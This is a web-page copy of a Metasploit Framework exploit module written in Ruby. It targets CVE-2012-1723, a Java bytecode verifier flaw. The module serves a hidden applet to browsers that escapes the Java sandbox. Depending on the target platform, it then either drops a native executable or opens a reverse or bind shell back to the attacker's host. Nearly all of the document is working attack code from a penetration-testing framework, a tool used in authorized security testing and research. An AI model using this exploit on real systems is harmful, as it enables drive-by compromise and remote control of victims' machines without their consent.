Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/java_verifier_field_access.rb
19664 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::HttpServer::HTML
10
include Msf::Exploit::EXE
11
12
include Msf::Exploit::Remote::BrowserAutopwn
13
autopwn_info({ :javascript => false })
14
15
def initialize(info = {})
16
super(
17
update_info(
18
info,
19
'Name' => 'Java Applet Field Bytecode Verifier Cache Remote Code Execution',
20
'Description' => %q{
21
This module exploits a vulnerability in HotSpot bytecode verifier where an invalid
22
optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient
23
type checks. This allows a way to escape the JRE sandbox, and load additional classes
24
in order to perform malicious operations.
25
},
26
'License' => MSF_LICENSE,
27
'Author' => [
28
'Stefan Cornelius', # Discoverer
29
'mihi', # Vuln analysis
30
'littlelightlittlefire', # metasploit module
31
'juan vazquez', # merged code (overlapped)
32
'sinn3r' # merged code (overlapped)
33
],
34
'References' => [
35
['CVE', '2012-1723'],
36
['OSVDB', '82877'],
37
['BID', '52161'],
38
['URL', 'http://schierlm.users.sourceforge.net/CVE-2012-1723.html'],
39
['URL', 'http://www.oracle.com/technetwork/topics/security/javacpujun2012-1515912.html'],
40
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=829373'],
41
['URL', 'http://icedtea.classpath.org/hg/release/icedtea7-forest-2.1/hotspot/rev/253e7c32def9'],
42
['URL', 'http://icedtea.classpath.org/hg/release/icedtea7-forest-2.1/hotspot/rev/8f86ad60699b']
43
],
44
'Platform' => %w{java linux osx solaris win},
45
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
46
'Targets' => [
47
[
48
'Generic (Java Payload)',
49
{
50
'Platform' => ['java'],
51
'Arch' => ARCH_JAVA
52
}
53
],
54
[
55
'Windows x86 (Native Payload)',
56
{
57
'Platform' => 'win',
58
'Arch' => ARCH_X86
59
}
60
],
61
[
62
'Mac OS X PPC (Native Payload)',
63
{
64
'Platform' => 'osx',
65
'Arch' => ARCH_PPC
66
}
67
],
68
[
69
'Mac OS X x86 (Native Payload)',
70
{
71
'Platform' => 'osx',
72
'Arch' => ARCH_X86
73
}
74
],
75
[
76
'Linux x86 (Native Payload)',
77
{
78
'Platform' => 'linux',
79
'Arch' => ARCH_X86
80
}
81
],
82
],
83
'DefaultTarget' => 0,
84
'DisclosureDate' => '2012-06-06',
85
'Notes' => {
86
'Reliability' => UNKNOWN_RELIABILITY,
87
'Stability' => UNKNOWN_STABILITY,
88
'SideEffects' => UNKNOWN_SIDE_EFFECTS
89
}
90
)
91
)
92
end
93
94
def exploit
95
# load the static jar file
96
path = File.join(Msf::Config.data_directory, "exploits", "CVE-2012-1723.jar")
97
fd = File.open(path, "rb")
98
@jar_data = fd.read(fd.stat.size)
99
fd.close
100
101
super
102
end
103
104
def on_request_uri(cli, request)
105
data = ""
106
host = ""
107
port = ""
108
109
if not request.uri.match(/\.jar$/i)
110
if not request.uri.match(/\/$/)
111
send_redirect(cli, get_resource() + '/', '')
112
return
113
end
114
115
print_status("Sending #{self.name}")
116
117
payload = regenerate_payload(cli)
118
if not payload
119
print_error("Failed to generate the payload.")
120
return
121
end
122
123
if target.name == 'Generic (Java Payload)'
124
if datastore['LHOST']
125
jar = payload.encoded
126
host = datastore['LHOST']
127
port = datastore['LPORT']
128
vprint_status("Sending java reverse shell")
129
else
130
port = datastore['LPORT']
131
host = cli.peerhost
132
vprint_status("Java bind shell")
133
end
134
if jar
135
print_status("Generated jar to drop (#{jar.length} bytes).")
136
jar = Rex::Text.to_hex(jar, prefix = "")
137
else
138
print_error("Failed to generate the executable.")
139
return
140
end
141
else
142
143
# NOTE: The EXE mixin automagically handles detection of arch/platform
144
data = generate_payload_exe
145
146
print_status("Generated executable to drop (#{data.length} bytes).")
147
data = Rex::Text.to_hex(data, prefix = "")
148
149
end
150
151
send_response_html(cli, generate_html(data, jar, host, port), { 'Content-Type' => 'text/html' })
152
return
153
end
154
155
print_status("Sending jar")
156
send_response(cli, generate_jar(), { 'Content-Type' => "application/octet-stream" })
157
158
handler(cli)
159
end
160
161
def generate_html(data, jar, host, port)
162
jar_name = rand_text_alpha(rand(6) + 3) + ".jar"
163
164
html = "<html><head></head>"
165
html += "<body>"
166
html += "<applet archive=\"#{jar_name}\" code=\"cve1723.Attacker\" width=\"1\" height=\"1\">"
167
html += "<param name=\"data\" value=\"#{data}\"/>" if data
168
html += "<param name=\"jar\" value=\"#{jar}\"/>" if jar
169
html += "<param name=\"lhost\" value=\"#{host}\"/>" if host
170
html += "</applet></body></html>"
171
return html
172
end
173
174
def generate_jar()
175
@jar_data
176
end
177
end
178
179